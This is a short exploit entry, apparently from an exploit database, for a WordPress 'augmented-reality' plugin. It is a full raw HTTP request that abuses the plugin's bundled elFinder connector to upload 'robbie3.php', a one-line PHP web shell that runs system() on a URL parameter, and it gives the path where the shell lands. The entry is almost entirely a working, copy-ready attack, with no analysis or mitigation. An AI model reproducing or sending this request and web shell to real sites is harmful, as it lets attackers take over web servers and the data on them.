Share
## https://sploitus.com/exploit?id=WPEX-ID:10457
POST /wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php HTTP/1.1
Host: 192.168.1.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42474892822150178483835528074
Content-Length: 737
Connection: close
Cookie: PHPSESSID=8940b45029f28b38e8339bae4dd10b18

-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="reqid"

1744f7298611ba
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="cmd"

upload
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="target"

l1_Lw
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="upload[]"; filename="robbie3.php"
Content-Type: application/php

<?php system($_GET['cmd']); ?>

-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="mtime[]"

1597850374
-----------------------------42474892822150178483835528074--
```

File ends up 

/wp-content/plugins/augmented-reality/file_manager/robbie3.php